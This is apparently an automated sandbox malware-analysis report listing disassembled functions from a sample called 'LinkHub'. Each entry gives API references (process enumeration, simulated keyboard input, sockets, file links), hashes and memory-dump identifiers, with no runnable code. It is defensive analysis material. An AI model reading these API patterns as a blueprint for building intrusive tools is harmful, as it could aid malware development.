Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 0700fed8b70cb9ce5bea6d99165d092661fa89b9337e4173af2e508fdf713c47
Instruction ID: 629ef84120affbe95ea080947cb279301a37924b2dba7458fbe4fc73dc989b00
Opcode Fuzzy Hash: 0700fed8b70cb9ce5bea6d99165d092661fa89b9337e4173af2e508fdf713c47
Instruction Fuzzy Hash: 10015731514218AFEF219F15DC84BAA7BB4FB44351F1080EAF84AE6151DF308A95EF21

Function 00B6096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 149e471dae798984eec43e8f1a2cc9f5b83bdd7dc743f12d8cbd6982852ebd1e
Instruction ID: a3a8241fc7e873b017296cd679800fddd3d620cbc9088580c7a63f74856550fa
Opcode Fuzzy Hash: 149e471dae798984eec43e8f1a2cc9f5b83bdd7dc743f12d8cbd6982852ebd1e
Instruction Fuzzy Hash: FBC15875A1020AEFCB04DFA5C894EAAB7F5FF48704F248598E506EB251D735EE81CB90

Function 00B341F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00B3427E
__alldvrm.LIBCMT ref: 00B3447F
__alldvrm.LIBCMT ref: 00B344A1

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 6b642ec63ff6d3c82f2208d2655f2e81e391796f6f1882e4d3dcf0040d879e3b
Instruction ID: c5ec5e54cb796638f872a91ccd55add52806b24bb137be12d874cd9804ba29c5
Opcode Fuzzy Hash: 6b642ec63ff6d3c82f2208d2655f2e81e391796f6f1882e4d3dcf0040d879e3b
Instruction Fuzzy Hash: DDA135729003869FEB22CF18C891BAEBBE5EF55314F3441F9E9959B382C738A941C754

Function 00B60D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00BA0BD4,?), ref: 00B60EE0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00BA0BD4,?), ref: 00B60EF8
CLSIDFromProgID.OLE32(?,?,00000000,00B9DCE0,000000FF,?,00000000,00000800,00000000,?,00BA0BD4,?), ref: 00B60F1D
_memcmp.LIBVCRUNTIME ref: 00B60F3E

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 49496b8754f80a7efa0c985b7b24902d9b4d97c13874d19c61614825f2647092
Instruction ID: 3a7c3e72e74201b00550f0643865a3364a226e3bebfbbfcf17d94c6bce2f4b1a
Opcode Fuzzy Hash: 49496b8754f80a7efa0c985b7b24902d9b4d97c13874d19c61614825f2647092
Instruction Fuzzy Hash: 77811671A10109EFCB04EF94C984EEEB7F9FF89315F204598E506AB250DB75AE06CB60

Function 00B8B0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00B8B10C
Process32FirstW.KERNEL32(00000000,?), ref: 00B8B11A

Part of subcall function 00B0B329: _wcslen.LIBCMT ref: 00B0B333

Process32NextW.KERNEL32(00000000,?), ref: 00B8B1FC
CloseHandle.KERNEL32(00000000), ref: 00B8B20B

Part of subcall function 00B1E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00B44D73,?), ref: 00B1E395

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 3540b085da5ce4b895bd8011463b2776899a9bfc618ea46af20e45d6567449fe
Instruction ID: da30de21cd0ec48a086a8a01d4275b2567874cceacfaca9e3d29a95780a37202
Opcode Fuzzy Hash: 3540b085da5ce4b895bd8011463b2776899a9bfc618ea46af20e45d6567449fe
Instruction Fuzzy Hash: 6D513B71508301AFD310EF24D886E6BBBE8FF89754F40499DF595972A1EB70E904CB92

Function 00B41711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00B41840

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 6c3b2f803f2da573b7dcadf84c4ec18d475f1db63596c25b3bd23028edf7feeb
Instruction ID: d35da01554422a2f73929016d830c25e75237b757e188b3ef4bab3348b9a3efb
Opcode Fuzzy Hash: 6c3b2f803f2da573b7dcadf84c4ec18d475f1db63596c25b3bd23028edf7feeb
Instruction Fuzzy Hash: D7414971E00111ABDB216FBD9C82A7E3BF4EF41330F240AF5F418D6291EB354E81A662

Function 00B82533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00B8255A
WSAGetLastError.WSOCK32 ref: 00B82568
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00B825E7
WSAGetLastError.WSOCK32 ref: 00B825F1

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: fdf6de41cc6ada12bdf841247bd10a9661ca48df8593905bd9deb0395c7e312a
Instruction ID: 09fd5b1fbfbb85dbd7967638e1481af8aa11338559f5cd27bf03a5824f1c18c4
Opcode Fuzzy Hash: fdf6de41cc6ada12bdf841247bd10a9661ca48df8593905bd9deb0395c7e312a
Instruction Fuzzy Hash: D041D374A40200AFE720AF24D886F667BE5EB04754F54C4C8F9598F2E2D772ED42CB90

Function 00B96CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00B96D1A
ScreenToClient.USER32(?,?), ref: 00B96D4D
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00B96DBA

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: f0a28526fc87e022a300d35f37e2270381a6d0f99a8f19c29d788789296e8129
Instruction ID: f3a71bce498042f9b6363b1e929cc72be260001742c6749e0ddfefcfdc8dced5
Opcode Fuzzy Hash: f0a28526fc87e022a300d35f37e2270381a6d0f99a8f19c29d788789296e8129
Instruction Fuzzy Hash: FD511E74A00609EFCF14DF64D980AAE7BF6FF54360F1085AAF92597290DB30AD41CB50

Function 00B3B79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5189fb1ff2837ef23e943cb9dd3419897153561d05673224d6f09674fd15dc5d
Instruction ID: 235b7ab5b6b006903eca11394eb9ae4ef280a5106b5ec3d64976be134f978d3a
Opcode Fuzzy Hash: 5189fb1ff2837ef23e943cb9dd3419897153561d05673224d6f09674fd15dc5d
Instruction Fuzzy Hash: 9041D772A00704AFD725AF78CC41FAABBEDEB88710F2085BAF215DB291D77199018790

Function 00B7611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B761C8
GetLastError.KERNEL32(?,00000000), ref: 00B761EE
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B76213
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B7623F

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: e566905fa21d78e0b1a6522d747d560b33564ae23b6f79ec1909baa6c6cb27ee
Instruction ID: 2fad7b60432a307b6fd82598d0eaa065391edf1a1440c7ecbb207a3818e9bdca
Opcode Fuzzy Hash: e566905fa21d78e0b1a6522d747d560b33564ae23b6f79ec1909baa6c6cb27ee
Instruction Fuzzy Hash: 0F411D35600A11DFCB11EF15C585A5EBBE2EF89710B19C4C8E85AAB7A2CB35FD01CB91

Function 00B6B41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00B6B473
SetKeyboardState.USER32(00000080), ref: 00B6B48F
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00B6B4FD
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00B6B54F

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: dece7a33caacbc2d2b624d9cbc870d1a630509de96229d2560eb1c145908e45a
Instruction ID: 34a2639f59089b16bad57418937a5c991d15cf6f0f5117aac1312aaedc3b132e
Opcode Fuzzy Hash: dece7a33caacbc2d2b624d9cbc870d1a630509de96229d2560eb1c145908e45a
Instruction Fuzzy Hash: DB312870A402086EFF308B258855FFA7BF9EF55310F04429AE596D62D2CB7C8AC58751

Function 00B6B563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00B6B5B8
SetKeyboardState.USER32(00000080,?,00008000), ref: 00B6B5D4
PostMessageW.USER32(00000000,00000101,00000000), ref: 00B6B63B
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00B6B68D

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 3347b27f18a35b9c80d42baa1a8beb5f217eceb6589e992d1257bfff74b397a4
Instruction ID: 0a42cfe92a214a50f59339030f85010e8f5da5141573950381a6c1eea76635e7
Opcode Fuzzy Hash: 3347b27f18a35b9c80d42baa1a8beb5f217eceb6589e992d1257bfff74b397a4
Instruction Fuzzy Hash: E231E8319406086EFF348B65C805FFABBF6EB95310F0482AAE485D61D1C77C8AD58B51

Function 00B980AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00B980D4
GetWindowRect.USER32(?,?), ref: 00B9814A
PtInRect.USER32(?,?,?), ref: 00B9815A
MessageBeep.USER32(00000000), ref: 00B981C6

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 942ea79203284a6c7b8f60aa3234c6e4c18de975d5842206336d305b35f315e6
Instruction ID: 569a064bdaaff2778070c2b948381bc2d2113c9662df13475d12295cc672c74c
Opcode Fuzzy Hash: 942ea79203284a6c7b8f60aa3234c6e4c18de975d5842206336d305b35f315e6
Instruction Fuzzy Hash: 75418930A01225DFCF15CF59D894BA9BBF5FB5A310F1480F9E954AB262DB35E842CB90

Function 00B92176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00B92187

Part of subcall function 00B64393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B643AD
Part of subcall function 00B64393: GetCurrentThreadId.KERNEL32 ref: 00B643B4
Part of subcall function 00B64393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B62F00), ref: 00B643BB

GetCaretPos.USER32(?), ref: 00B9219B
ClientToScreen.USER32(00000000,?), ref: 00B921E8
GetForegroundWindow.USER32 ref: 00B921EE

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 300c2a9d6d8cd3f09412a7eec54acb5f7bf23e39c4513b34eab42acd95f238c9
Instruction ID: 4a745376ec6b4aa082fbc5231abe48967bc1b5e850e54889bc7b12487c92b860
Opcode Fuzzy Hash: 300c2a9d6d8cd3f09412a7eec54acb5f7bf23e39c4513b34eab42acd95f238c9
Instruction Fuzzy Hash: CA314171D00609AFCB04DFA9C981CAEBBF8EF48304B5484AAE515E7351DB75DE45CBA0

Function 00B6E8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00B041EA: _wcslen.LIBCMT ref: 00B041EF

_wcslen.LIBCMT ref: 00B6E8E2
_wcslen.LIBCMT ref: 00B6E8F9
_wcslen.LIBCMT ref: 00B6E924
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00B6E92F

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: 7423fd2c8d5a4ecf1917ca0ec9617a1b9d99b2a016dc100bd0a3beb482c0a847
Instruction ID: a509ebfac365863d5378eb0f6882fea1eb787c2c405ffe5cf6c128987af7e309
Opcode Fuzzy Hash: 7423fd2c8d5a4ecf1917ca0ec9617a1b9d99b2a016dc100bd0a3beb482c0a847
Instruction Fuzzy Hash: C121D375D00224EFCB10AFA8D982BAEB7F8EF45350F1040A5F918BB281D7749E41CBA1

Function 00B99A25 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B024B0

GetCursorPos.USER32(?), ref: 00B99A5D
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B99A72
GetCursorPos.USER32(?), ref: 00B99ABA
DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00B99AF0

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 5fdc94c6fb39f76fb722f532e104a9ef3b49272a024350798dd15df1888cd216
Instruction ID: 33df2040fd5c39d875a28e69870ed793345e6d8e583a6ed5ac8177dc17e9043f
Opcode Fuzzy Hash: 5fdc94c6fb39f76fb722f532e104a9ef3b49272a024350798dd15df1888cd216
Instruction Fuzzy Hash: 6821BF31600018AFCF258F99C898EEA7FF9EB09710F4040AAF9058B1A1D73A9950DB60

Function 00B6DB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00B9DC30), ref: 00B6DBA6
GetLastError.KERNEL32 ref: 00B6DBB5
CreateDirectoryW.KERNEL32(?,00000000), ref: 00B6DBC4
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00B9DC30), ref: 00B6DC21

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 0ce46e4fea40b4842a69f21cf7bb7b3582edf6ce94c32d2088f72ca7110a1210
Instruction ID: 9ba295586f095d8a28d9bacb75b6ad373c51a448ed7784c93c580d8dca6d1e1e
Opcode Fuzzy Hash: 0ce46e4fea40b4842a69f21cf7bb7b3582edf6ce94c32d2088f72ca7110a1210
Instruction Fuzzy Hash: C621A171A083059FC710DF28C98096BBBE8EE5A364F140AA9F499C32E1DB34D946CB52

Function 00B9321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00B932A6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B932C0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B932CE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00B932DC

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 1dab0369aecfe5fddbae0d6faa901954c75c9ba77da5a94954f08a3ce2bba016
Instruction ID: ea2986423d4a57788ff634388cbf295f2d07a528b563ea6fefa07a0c15dccfcf
Opcode Fuzzy Hash: 1dab0369aecfe5fddbae0d6faa901954c75c9ba77da5a94954f08a3ce2bba016
Instruction Fuzzy Hash: 7621D331205111AFDB149B24C845F6ABBE5EF85724F2482A9F8268B2D2CB71ED41CBD0

Function 00B6825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B696E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00B68271,?,000000FF,?,00B690BB,00000000,?,0000001C,?,?), ref: 00B696F3
Part of subcall function 00B696E4: lstrcpyW.KERNEL32(00000000,?,?,00B68271,?,000000FF,?,00B690BB,00000000,?,0000001C,?,?,00000000), ref: 00B69719
Part of subcall function 00B696E4: lstrcmpiW.KERNEL32(00000000,?,00B68271,?,000000FF,?,00B690BB,00000000,?,0000001C,?,?), ref: 00B6974A

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00B690BB,00000000,?,0000001C,?,?,00000000), ref: 00B6828A
lstrcpyW.KERNEL32(00000000,?,?,00B690BB,00000000,?,0000001C,?,?,00000000), ref: 00B682B0
lstrcmpiW.KERNEL32(00000002,cdecl,?,00B690BB,00000000,?,0000001C,?,?,00000000), ref: 00B682EB

Strings

cdecl, xrefs: 00B682E2

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
